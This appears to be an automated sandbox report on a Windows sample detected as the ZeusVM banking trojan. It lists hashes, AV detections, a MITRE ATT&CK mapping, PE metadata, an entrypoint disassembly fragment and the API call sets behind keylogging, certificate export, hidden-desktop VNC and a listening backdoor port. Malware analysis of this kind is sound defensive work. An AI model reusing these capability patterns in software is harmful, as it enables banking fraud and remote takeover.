Play interactive tour

Edit tour

Analysis Report K8nV75e45o

Overview

General Information

Sample Name:	K8nV75e45o (renamed file extension from none to exe)
Analysis ID:	376941
MD5:	b4bd8726c7a17ed5d3e99069a8e5872c
SHA1:	5f69352894ed9a03ad1aac338605e823802545ee
SHA256:	fdaba3f0e49475409607ec915599d216ef30351eb34e6c52716a74921285c994
Tags:	uncategorized
Infos:
Most interesting Screenshot:

Detection

ZeusVM

Score:	72
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Detected ZeusVM e-Banking Trojan

Multi AV Scanner detection for submitted file

Contains VNC / remote desktop functionality (version string found)

Machine Learning detection for sample

Antivirus or Machine Learning detection for unpacked file

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality to call native functions

Contains functionality to dynamically determine API calls

Contains functionality to enumerate network shares

Contains functionality to launch a process as a different user

Contains functionality to open a port and listen for incoming connection (possibly a backdoor)

Contains functionality to read the PEB

Contains functionality to read the clipboard data

Contains functionality to retrieve information about pressed keystrokes

Contains functionality to shutdown / reboot the system

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Detected potential crypto function

Extensive use of GetProcAddress (often used to hide API calls)

May initialize a security null descriptor

Program does not show much activity (idle)

Uses 32bit PE files

Uses Microsoft's Enhanced Cryptographic Provider

Uses code obfuscation techniques (call, push, ret)

Classification

Startup

System is w10x64

K8nV75e45o.exe (PID: 3924 cmdline: 'C:\Users\user\Desktop\K8nV75e45o.exe' MD5: B4BD8726C7A17ED5D3E99069A8E5872C)

cleanup

Malware Configuration

No configs have been found

Yara Overview

No yara matches

Sigma Overview

No Sigma rule has matched

Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection:

Antivirus / Scanner detection for submitted sample

Show sources

Source: K8nV75e45o.exe

Avira: detected

Multi AV Scanner detection for submitted file

Show sources

Source: K8nV75e45o.exe	Virustotal: Detection: 90%	Perma Link
Source: K8nV75e45o.exe	Metadefender: Detection: 89%	Perma Link
Source: K8nV75e45o.exe	ReversingLabs: Detection: 96%

Machine Learning detection for sample

Show sources

Source: K8nV75e45o.exe

Joe Sandbox ML: detected

Source: 0.2.K8nV75e45o.exe.400000.0.unpack	Avira: Label: TR/Kazy.MK
Source: 0.0.K8nV75e45o.exe.400000.0.unpack	Avira: Label: TR/Kazy.MK

Source: C:\Users\user\Desktop\K8nV75e45o.exe	Code function: 0_2_00412C9A CryptUnprotectData,LocalFree,		0_2_00412C9A
Source: C:\Users\user\Desktop\K8nV75e45o.exe	Code function: 0_2_004176C6 CryptAcquireContextW,CryptCreateHash,CryptHashData,CryptGetHashParam,CryptDestroyHash,CryptReleaseContext,		0_2_004176C6

Source: K8nV75e45o.exe

Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE

Source: C:\Users\user\Desktop\K8nV75e45o.exe

Code function: 0_2_0040EECB GetFileAttributesExW,ReadProcessMemory,LoadLibraryW,GetProcAddress,SHGetFolderPathW,StrCmpNIW,FreeLibrary,NetUserEnum,NetUserGetInfo,NetApiBufferFree,NetApiBufferFree,SHGetFolderPathW,

0_2_0040EECB

Source: C:\Users\user\Desktop\K8nV75e45o.exe	Code function: 0_2_0041BA9D FindFirstFileW,FindNextFileW,FindClose,SetFileAttributesW,RemoveDirectoryW,		0_2_0041BA9D
Source: C:\Users\user\Desktop\K8nV75e45o.exe	Code function: 0_2_0041BB58 FindFirstFileW,Sleep,WaitForSingleObject,PathMatchSpecW,Sleep,Sleep,FindNextFileW,FindClose,		0_2_0041BB58

Source: C:\Users\user\Desktop\K8nV75e45o.exe

Code function: 0_2_0041201E InternetReadFileExA,

0_2_0041201E

Source: K8nV75e45o.exe	String found in binary or memory: http://www.google.com/webhp
Source: K8nV75e45o.exe	String found in binary or memory: http://www.google.com/webhpbc.exe-f

Source: C:\Users\user\Desktop\K8nV75e45o.exe

Code function: 0_2_004098BE NtCreateUserProcess,NtCreateThread,LdrLoadDll,GetFileAttributesExW,HttpSendRequestW,HttpSendRequestA,HttpSendRequestExW,HttpSendRequestExA,InternetCloseHandle,InternetReadFile,InternetReadFileExA,InternetQueryDataAvailable,HttpQueryInfoA,closesocket,send,WSASend,OpenInputDesktop,SwitchDesktop,DefWindowProcW,DefWindowProcA,DefDlgProcW,DefDlgProcA,DefFrameProcW,DefFrameProcA,DefMDIChildProcW,DefMDIChildProcA,CallWindowProcW,CallWindowProcA,RegisterClassW,RegisterClassA,RegisterClassExW,RegisterClassExA,BeginPaint,EndPaint,GetDCEx,GetDC,GetWindowDC,ReleaseDC,GetUpdateRect,GetUpdateRgn,GetMessagePos,GetCursorPos,SetCursorPos,SetCapture,ReleaseCapture,GetCapture,GetMessageW,GetMessageA,PeekMessageW,PeekMessageA,TranslateMessage,GetClipboardData,PFXImportCertStore,

0_2_004098BE

Source: C:\Users\user\Desktop\K8nV75e45o.exe

Code function: 0_2_0041618F EnterCriticalSection,GetTickCount,LeaveCriticalSection,GetKeyboardState,ToUnicode,TranslateMessage,

0_2_0041618F

E-Banking Fraud:

Detected ZeusVM e-Banking Trojan

Show sources

Source: C:\Users\user\Desktop\K8nV75e45o.exe

Code function: 0_2_0041D159 lstrcmpiA,lstrcmpiA,lstrcmpiA,CloseHandle,

0_2_0041D159

Source: C:\Users\user\Desktop\K8nV75e45o.exe

Code function: 0_2_00405A43 OpenWindowStationW,CreateWindowStationW,GetProcessWindowStation,OpenDesktopW,CreateDesktopW,GetCurrentThreadId,GetThreadDesktop,SetThreadDesktop,CloseDesktop,CloseWindowStation,

0_2_00405A43

Source: C:\Users\user\Desktop\K8nV75e45o.exe	Code function: 0_2_004098BE NtCreateUserProcess,NtCreateThread,LdrLoadDll,GetFileAttributesExW,HttpSendRequestW,HttpSendRequestA,HttpSendRequestExW,HttpSendRequestExA,InternetCloseHandle,InternetReadFile,InternetReadFileExA,InternetQueryDataAvailable,HttpQueryInfoA,closesocket,send,WSASend,OpenInputDesktop,SwitchDesktop,DefWindowProcW,DefWindowProcA,DefDlgProcW,DefDlgProcA,DefFrameProcW,DefFrameProcA,DefMDIChildProcW,DefMDIChildProcA,CallWindowProcW,CallWindowProcA,RegisterClassW,RegisterClassA,RegisterClassExW,RegisterClassExA,BeginPaint,EndPaint,GetDCEx,GetDC,GetWindowDC,ReleaseDC,GetUpdateRect,GetUpdateRgn,GetMessagePos,GetCursorPos,SetCursorPos,SetCapture,ReleaseCapture,GetCapture,GetMessageW,GetMessageA,PeekMessageW,PeekMessageA,TranslateMessage,GetClipboardData,PFXImportCertStore,	0_2_004098BE
Source: C:\Users\user\Desktop\K8nV75e45o.exe	Code function: 0_2_00412245 NtQueryInformationProcess,CloseHandle,NtCreateThread,	0_2_00412245
Source: C:\Users\user\Desktop\K8nV75e45o.exe	Code function: 0_2_004122FC NtCreateUserProcess,GetProcessId,GetThreadContext,SetThreadContext,VirtualFreeEx,CloseHandle,	0_2_004122FC

Source: C:\Users\user\Desktop\K8nV75e45o.exe

Code function: 0_2_00417D43 LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,CreateProcessAsUserW,CloseHandle,CloseHandle,CloseHandle,FreeLibrary,

0_2_00417D43

Source: C:\Users\user\Desktop\K8nV75e45o.exe	Code function: 0_2_0040BA8F InitiateSystemShutdownExW,ExitWindowsEx,		0_2_0040BA8F
Source: C:\Users\user\Desktop\K8nV75e45o.exe	Code function: 0_2_00406F85 CreateMutexW,GetLastError,CloseHandle,CloseHandle,ExitWindowsEx,OpenEventW,SetEvent,CloseHandle,CloseHandle,GetFileAttributesExW,ReadProcessMemory,GetFileAttributesExW,ReadProcessMemory,Sleep,IsWellKnownSid,GetFileAttributesExW,ReadProcessMemory,GetFileAttributesExW,VirtualFree,CreateEventW,WaitForSingleObject,WaitForMultipleObjects,CloseHandle,CloseHandle,CloseHandle,CloseHandle,		0_2_00406F85

Source: C:\Users\user\Desktop\K8nV75e45o.exe	Code function: 0_2_00419174	0_2_00419174
Source: C:\Users\user\Desktop\K8nV75e45o.exe	Code function: 0_2_004175D2	0_2_004175D2
Source: C:\Users\user\Desktop\K8nV75e45o.exe	Code function: 0_2_004021F3	0_2_004021F3
Source: C:\Users\user\Desktop\K8nV75e45o.exe	Code function: 0_2_0040AE91	0_2_0040AE91

Source: K8nV75e45o.exe

Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE

Source: classification engine

Classification label: mal72.bank.troj.winEXE@1/0@0/0

Source: C:\Users\user\Desktop\K8nV75e45o.exe	Code function: 0_2_0040C0B2 CertOpenSystemStoreW,CertEnumCertificatesInStore,CertEnumCertificatesInStore,CertEnumCertificatesInStore,PFXExportCertStoreEx,PFXExportCertStoreEx,PFXExportCertStoreEx,CharLowerW,GetSystemTime,CertCloseStore,		0_2_0040C0B2
Source: C:\Users\user\Desktop\K8nV75e45o.exe	Code function: 0_2_0040C227 CertOpenSystemStoreW,CertEnumCertificatesInStore,CertDuplicateCertificateContext,CertDeleteCertificateFromStore,CertEnumCertificatesInStore,CertCloseStore,		0_2_0040C227

Source: C:\Users\user\Desktop\K8nV75e45o.exe

Code function: 0_2_00417AED GetCurrentThread,OpenThreadToken,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,CloseHandle,

0_2_00417AED

Source: C:\Users\user\Desktop\K8nV75e45o.exe

Code function: 0_2_00417A96 CreateToolhelp32Snapshot,Thread32First,Thread32Next,CloseHandle,

0_2_00417A96

Source: C:\Users\user\Desktop\K8nV75e45o.exe

Code function: 0_2_0041C8C2 CoCreateInstance,VariantInit,SysAllocString,VariantClear,

0_2_0041C8C2

Source: K8nV75e45o.exe

Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\K8nV75e45o.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: K8nV75e45o.exe	Virustotal: Detection: 90%
Source: K8nV75e45o.exe	Metadefender: Detection: 89%
Source: K8nV75e45o.exe	ReversingLabs: Detection: 96%

Source: C:\Users\user\Desktop\K8nV75e45o.exe

Code function: 0_2_00418469 LoadLibraryA,GetProcAddress,FreeLibrary,

0_2_00418469

Source: C:\Users\user\Desktop\K8nV75e45o.exe	Code function: 0_2_0040247D push es; iretd	0_2_0040248C
Source: C:\Users\user\Desktop\K8nV75e45o.exe	Code function: 0_2_00402B49 push cs; iretd	0_2_00402B58
Source: C:\Users\user\Desktop\K8nV75e45o.exe	Code function: 0_2_00402B13 push cs; ret	0_2_00402B28

Source: C:\Users\user\Desktop\K8nV75e45o.exe

Code function: 0_2_0040F20F LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadImageW,GetIconInfo,GetCursorPos,DrawIcon,lstrcmpiW,FreeLibrary,FreeLibrary,FreeLibrary,FreeLibrary,

0_2_0040F20F

Source: all processes

Thread injection, dropped files, key value created, disk infection and DNS query: no activity detected

Source: C:\Users\user\Desktop\K8nV75e45o.exe	Code function: 0_2_0041BA9D FindFirstFileW,FindNextFileW,FindClose,SetFileAttributesW,RemoveDirectoryW,		0_2_0041BA9D
Source: C:\Users\user\Desktop\K8nV75e45o.exe	Code function: 0_2_0041BB58 FindFirstFileW,Sleep,WaitForSingleObject,PathMatchSpecW,Sleep,Sleep,FindNextFileW,FindClose,		0_2_0041BB58

Source: C:\Users\user\Desktop\K8nV75e45o.exe

Code function: 0_2_00412425 LdrLoadDll,LdrGetDllHandle,LdrLoadDll,EnterCriticalSection,lstrcmpiW,LeaveCriticalSection,

0_2_00412425

Source: C:\Users\user\Desktop\K8nV75e45o.exe

Code function: 0_2_00418469 LoadLibraryA,GetProcAddress,FreeLibrary,

0_2_00418469

Source: C:\Users\user\Desktop\K8nV75e45o.exe

Code function: 0_2_00406015 mov edx, dword ptr fs:[00000030h]

0_2_00406015

Source: C:\Users\user\Desktop\K8nV75e45o.exe

Code function: 0_2_0040635A GetModuleHandleW,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,HeapCreate,GetProcessHeap,InitializeCriticalSection,WSAStartup,CreateEventW,GetLengthSid,GetCurrentProcessId,

0_2_0040635A

Source: all processes

Thread injection, dropped files, key value created, disk infection and DNS query: no activity detected

Source: C:\Users\user\Desktop\K8nV75e45o.exe

Code function: 0_2_00419A10 InitializeSecurityDescriptor,SetSecurityDescriptorDacl,ConvertStringSecurityDescriptorToSecurityDescriptorW,GetSecurityDescriptorSacl,SetSecurityDescriptorSacl,LocalFree,

0_2_00419A10

Source: C:\Users\user\Desktop\K8nV75e45o.exe

Code function: 0_2_0040C0B2 CertOpenSystemStoreW,CertEnumCertificatesInStore,CertEnumCertificatesInStore,CertEnumCertificatesInStore,PFXExportCertStoreEx,PFXExportCertStoreEx,PFXExportCertStoreEx,CharLowerW,GetSystemTime,CertCloseStore,

0_2_0040C0B2

Source: C:\Users\user\Desktop\K8nV75e45o.exe

Code function: 0_2_0040C056 GetUserNameExW,

0_2_0040C056

Source: C:\Users\user\Desktop\K8nV75e45o.exe

Code function: 0_2_0041654B GetTimeZoneInformation,

0_2_0041654B

Source: C:\Users\user\Desktop\K8nV75e45o.exe

Code function: 0_2_0040745C GetVersionExW,GetNativeSystemInfo,

0_2_0040745C

Source: K8nV75e45o.exe

Binary or memory string: S:(ML;;NRNWNX;;;LW)

Remote Access Functionality:

Contains VNC / remote desktop functionality (version string found)

Show sources

Source: K8nV75e45o.exe	String found in binary or memory: RFB 003.003
Source: K8nV75e45o.exe	String found in binary or memory: RFB 003.003
Source: K8nV75e45o.exe, 00000000.00000000.202422865.0000000000401000.00000020.00020000.sdmp	String found in binary or memory: $GetProcAddressLoadLibraryANtCreateThreadNtCreateUserProcessNtQueryInformationProcessRtlUserThreadStartLdrLoadDllLdrGetDllHandleSOFTWARE\Microsoft.dat0xB268B1AD#SysListView32MDIClientCiceroUIWndFrameConsoleWindowClass#32768SysShadowFIXME-vnspr4.dllPR_OpenTCPSocketPR_ClosePR_ReadPR_WriteRFB 003.003
Source: K8nV75e45o.exe	String found in binary or memory: RFB 003.003
Source: K8nV75e45o.exe	String found in binary or memory: $GetProcAddressLoadLibraryANtCreateThreadNtCreateUserProcessNtQueryInformationProcessRtlUserThreadStartLdrLoadDllLdrGetDllHandleSOFTWARE\Microsoft.dat0xB268B1AD#SysListView32MDIClientCiceroUIWndFrameConsoleWindowClass#32768SysShadowFIXME-vnspr4.dllPR_OpenTCPSocketPR_ClosePR_ReadPR_WriteRFB 003.003

Source: C:\Users\user\Desktop\K8nV75e45o.exe	Code function: 0_2_00419841 socket,bind,closesocket,		0_2_00419841
Source: C:\Users\user\Desktop\K8nV75e45o.exe	Code function: 0_2_00419563 socket,bind,listen,closesocket,		0_2_00419563

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts1	Native API1	Create Account1	Valid Accounts1	Valid Accounts1	Input Capture11	Network Share Discovery1	Remote Desktop Protocol1	Input Capture11	Exfiltration Over Other Network Medium	Encrypted Channel2	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	System Shutdown/Reboot1
Default Accounts	Scheduled Task/Job	Valid Accounts1	Access Token Manipulation11	Access Token Manipulation11	LSASS Memory	System Time Discovery2	Remote Desktop Protocol	Archive Collected Data1	Exfiltration Over Bluetooth	Remote Access Software1	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	At (Linux)	Application Shimming1	Application Shimming1	Obfuscated Files or Information1	Security Account Manager	Security Software Discovery1	SMB/Windows Admin Shares	Clipboard Data1	Automated Exfiltration	Ingress Tool Transfer1	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	Logon Script (Mac)	Logon Script (Mac)	Install Root Certificate1	NTDS	Process Discovery1	Distributed Component Object Model	Input Capture	Scheduled Transfer	Protocol Impersonation	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Network Logon Script	Software Packing1	LSA Secrets	Account Discovery1	SSH	Keylogging	Data Transfer Size Limits	Fallback Channels	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Launchd	Rc.common	Rc.common	Steganography	Cached Domain Credentials	System Owner/User Discovery1	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Multiband Communication	Jamming or Denial of Service		Abuse Accessibility Features
External Remote Services	Scheduled Task	Startup Items	Startup Items	Compile After Delivery	DCSync	File and Directory Discovery1	Windows Remote Management	Web Portal Capture	Exfiltration Over Alternative Protocol	Commonly Used Port	Rogue Wi-Fi Access Points		Data Encrypted for Impact
Drive-by Compromise	Command and Scripting Interpreter	Scheduled Task/Job	Scheduled Task/Job	Indicator Removal from Tools	Proc Filesystem	System Information Discovery3	Shared Webroot	Credential API Hooking	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Application Layer Protocol	Downgrade to Insecure Protocols		Generate Fraudulent Advertising Revenue

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
K8nV75e45o.exe	90%	Virustotal		Browse
K8nV75e45o.exe	92%	Metadefender		Browse
K8nV75e45o.exe	97%	ReversingLabs	Win32.Trojan.Zeus
K8nV75e45o.exe	100%	Avira	TR/Kazy.MK
K8nV75e45o.exe	100%	Joe Sandbox ML

Dropped Files

No Antivirus matches

Unpacked PE Files

Source	Detection	Scanner	Label	Link	Download
0.2.K8nV75e45o.exe.400000.0.unpack	100%	Avira	TR/Kazy.MK		Download File
0.0.K8nV75e45o.exe.400000.0.unpack	100%	Avira	TR/Kazy.MK		Download File

Domains

No Antivirus matches

URLs

No Antivirus matches

Domains and IPs

Contacted Domains

No contacted domains info

Contacted IPs

No contacted IP infos

General Information

Joe Sandbox Version:	31.0.0 Emerald
Analysis ID:	376941
Start date:	28.03.2021
Start time:	03:46:20
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 2m 21s
Hypervisor based Inspection enabled:	false
Report type:	full
Sample file name:	K8nV75e45o (renamed file extension from none to exe)
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of analysed new started processes analysed:	1
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal72.bank.troj.winEXE@1/0@0/0
EGA Information:	Failed
HDC Information:	Successful, ratio: 99.6% (good quality ratio 91.6%) Quality average: 82.5% Quality standard deviation: 30.1%
HCA Information:	Failed
Cookbook Comments:	Adjust boot time Enable AMSI Stop behavior analysis, all processes terminated

Simulations

Behavior and APIs

No simulations

Joe Sandbox View / Context

IPs

No context

Domains

No context

ASN

No context

JA3 Fingerprints

No context

Dropped Files

No context

Created / dropped Files

No created / dropped files found

Static File Info

General
File type:	MS-DOS executable
Entropy (8bit):	6.67054852527874
TrID:	Win32 Executable (generic) a (10002005/4) 99.94% DOS Executable Borland Pascal 7.0x (2037/25) 0.02% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% VXD Driver (31/22) 0.00%
File name:	K8nV75e45o.exe
File size:	141824
MD5:	b4bd8726c7a17ed5d3e99069a8e5872c
SHA1:	5f69352894ed9a03ad1aac338605e823802545ee
SHA256:	fdaba3f0e49475409607ec915599d216ef30351eb34e6c52716a74921285c994
SHA512:	cf1ca96b4913b62af6169183904446cfe568e357003873d0a58cc9363a6bde2d2ea538a7aa56d30674b25531803bf77ff3944ebea4a0e129e5c15bf4216fcf52
SSDEEP:	3072:nQuqviK2I7eGKyQCYxyoAIdA71BSFR5JD3AIP2+MDxIQeo:n9qKKFeG5oAPhBSFbJD3VPZQv
File Content Preview:	MZ......................................................................................................................................................................................................................PE..L...u.KN.....................:.....

File Icon


Icon Hash:	00828e8e8686b000

Static PE Info

General
Entrypoint:	0x40728b
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	32BIT_MACHINE, EXECUTABLE_IMAGE
DLL Characteristics:	TERMINAL_SERVER_AWARE, NX_COMPAT
Time Stamp:	0x4E4B9075 [Wed Aug 17 09:57:09 2011 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	5
OS Version Minor:	1
File Version Major:	5
File Version Minor:	1
Subsystem Version Major:	5
Subsystem Version Minor:	1
Import Hash:	28e141e08402af84d2753cccce4d826e

Entrypoint Preview

Instruction
push ebp
mov ebp, esp
sub esp, 10h
push ebx
push 00000000h
xor bl, bl
call 00007F1014DEF594h
test al, al
je 00007F1014DF05AAh
push 00008007h
mov byte ptr [ebp-10h], bl
mov byte ptr [ebp-0Ch], 00000001h
mov byte ptr [ebp-01h], bl
call dword ptr [0040126Ch]
lea eax, dword ptr [ebp-08h]
push eax
call dword ptr [00401270h]
push eax
call dword ptr [004012C4h]
test eax, eax
je 00007F1014DF0557h
xor edx, edx
cmp dword ptr [ebp-08h], edx
jle 00007F1014DF0511h
mov ecx, dword ptr [eax+edx*4]
test ecx, ecx
je 00007F1014DF0504h
cmp word ptr [ecx], 002Dh
jne 00007F1014DF04FEh
movzx ecx, word ptr [ecx+02h]
cmp ecx, 66h
je 00007F1014DF04F1h
cmp ecx, 69h
je 00007F1014DF04E8h
cmp ecx, 6Eh
je 00007F1014DF04DDh
cmp ecx, 76h
jne 00007F1014DF04E6h
mov byte ptr [ebp-01h], 00000001h
jmp 00007F1014DF04E0h
mov byte ptr [ebp-0Ch], 00000000h
jmp 00007F1014DF04DAh
mov bl, 01h
jmp 00007F1014DF04D6h
mov byte ptr [ebp-10h], 00000001h
inc edx
cmp edx, dword ptr [ebp-08h]
jl 00007F1014DF0493h
push eax
call dword ptr [00401230h]
test bl, bl
je 00007F1014DF04D9h
call 00007F1014DEFF45h
jmp 00007F1014DF0506h
cmp byte ptr [ebp-01h], 00000000h
je 00007F1014DF04F5h
call 00007F1014DF1631h
call 00007F1014DF25F9h
test byte ptr [00422940h], 00000004h
mov bl, al
je 00007F1014DF04EDh
push 00000000h
mov eax, 00422E10h
call 00007F1014DF148Eh
jmp 00007F1014DF04DFh

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x1f784	0x118	.text
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x0	0x0
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x25000	0x11ac	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x1000	0x5a0	.text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x20664	0x20800	False	0.641323617788	data	6.69796313177	IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.data	0x22000	0x2054	0x400	False	0.208984375	data	1.60912793454	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
.reloc	0x25000	0x166a	0x1800	False	0.6220703125	data	5.63175186351	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Imports

DLL	Import
KERNEL32.dll	CreateThread, GetLastError, GetThreadContext, SetThreadContext, VirtualAlloc, GetProcessId, GlobalLock, GlobalUnlock, GetEnvironmentVariableW, FileTimeToDosDateTime, GetTempFileNameW, HeapReAlloc, FindFirstFileW, SetEndOfFile, CreateProcessW, HeapAlloc, SystemTimeToFileTime, SetFilePointerEx, HeapFree, GetProcessHeap, IsBadReadPtr, SetFileTime, VirtualQueryEx, OpenProcess, Thread32First, WideCharToMultiByte, ReadProcessMemory, CreateFileMappingW, HeapDestroy, Thread32Next, ReadFile, GetTimeZoneInformation, MultiByteToWideChar, GetTempPathW, GetFileSizeEx, OpenMutexW, VirtualProtectEx, VirtualAllocEx, FindClose, RemoveDirectoryW, FindNextFileW, VirtualProtect, CreateToolhelp32Snapshot, GetFileTime, FileTimeToLocalFileTime, GetVolumeNameForVolumeMountPointW, DeleteFileW, GetFileInformationByHandle, CreateRemoteThread, Process32FirstW, Process32NextW, SetThreadPriority, GetCurrentThread, GetLocalTime, LoadLibraryA, SetFileAttributesW, WTSGetActiveConsoleSessionId, lstrcmpiA, LoadLibraryW, CreateDirectoryW, FreeLibrary, EnterCriticalSection, UnmapViewOfFile, MapViewOfFile, GetPrivateProfileIntW, FlushFileBuffers, CreateFileW, LeaveCriticalSection, InitializeCriticalSection, WriteFile, GetPrivateProfileStringW, GetSystemTime, ExpandEnvironmentStringsW, ResetEvent, TerminateProcess, TlsSetValue, TlsGetValue, TlsFree, HeapCreate, TlsAlloc, CreateMutexW, ReleaseMutex, SetLastError, GetNativeSystemInfo, WriteProcessMemory, LocalFree, GetCurrentProcessId, CloseHandle, DuplicateHandle, OpenEventW, GetFileAttributesExW, WaitForMultipleObjects, CreateEventW, GetProcAddress, GetVersionExW, VirtualFreeEx, VirtualFree, GetModuleHandleW, SetEvent, GetComputerNameW, SetErrorMode, GetCommandLineW, ExitProcess, GetCurrentThreadId, GetUserDefaultUILanguage, lstrcmpiW, GetModuleFileNameW, GetFileAttributesW, Sleep, GetTickCount, WaitForSingleObject, MoveFileExW
USER32.dll	GetMenu, RegisterClassExW, GetMenuItemRect, TrackPopupMenuEx, SystemParametersInfoW, GetClassNameW, ReleaseDC, GetMenuState, DefWindowProcA, DefMDIChildProcW, SwitchDesktop, GetMenuItemCount, DefDlgProcA, PostThreadMessageW, DefMDIChildProcA, HiliteMenuItem, RegisterClassW, GetDC, EndMenu, CallWindowProcW, DefWindowProcW, DefFrameProcW, RegisterClassA, GetShellWindow, GetMessageA, GetWindowDC, GetMessageW, SetCapture, PostMessageW, GetParent, GetWindowInfo, CharLowerBuffA, GetUpdateRgn, GetTopWindow, LoadImageW, MsgWaitForMultipleObjects, WindowFromPoint, CharLowerA, CharUpperW, SetWindowLongW, GetWindow, DispatchMessageW, GetKeyboardState, ToUnicode, MapVirtualKeyW, DrawIcon, GetIconInfo, CharToOemW, CharLowerW, GetSystemMetrics, TranslateMessage, GetClipboardData, FillRect, DrawEdge, OpenInputDesktop, BeginPaint, EndPaint, CallWindowProcA, GetUpdateRect, MenuItemFromPoint, GetDCEx, EqualRect, OpenWindowStationW, GetUserObjectInformationW, PrintWindow, RegisterClassExA, RegisterWindowMessageW, GetMenuItemID, GetClassLongW, GetCapture, SetCursorPos, GetWindowLongW, GetAncestor, PeekMessageW, PeekMessageA, SetWindowPos, GetCursorPos, SendMessageTimeoutW, IsWindow, ReleaseCapture, SendMessageW, MapWindowPoints, GetMessagePos, GetWindowThreadProcessId, IsRectEmpty, ExitWindowsEx, SetKeyboardState, GetSubMenu, DefDlgProcW, DefFrameProcA, GetWindowRect, SetThreadDesktop, CloseDesktop, OpenDesktopW, GetProcessWindowStation, CreateWindowStationW, CloseWindowStation, GetThreadDesktop, SetProcessWindowStation, CreateDesktopW, IntersectRect
ADVAPI32.dll	IsWellKnownSid, GetLengthSid, ConvertSidToStringSidW, InitiateSystemShutdownExW, EqualSid, RegOpenKeyExW, RegEnumKeyExW, RegCloseKey, CryptGetHashParam, OpenProcessToken, GetSidSubAuthority, CryptAcquireContextW, OpenThreadToken, GetSidSubAuthorityCount, GetTokenInformation, RegCreateKeyExW, CryptReleaseContext, RegQueryValueExW, CreateProcessAsUserW, InitializeSecurityDescriptor, SetSecurityDescriptorDacl, SetNamedSecurityInfoW, LookupPrivilegeValueW, CryptCreateHash, ConvertStringSecurityDescriptorToSecurityDescriptorW, GetSecurityDescriptorSacl, SetSecurityDescriptorSacl, CryptDestroyHash, AdjustTokenPrivileges, RegSetValueExW, CryptHashData
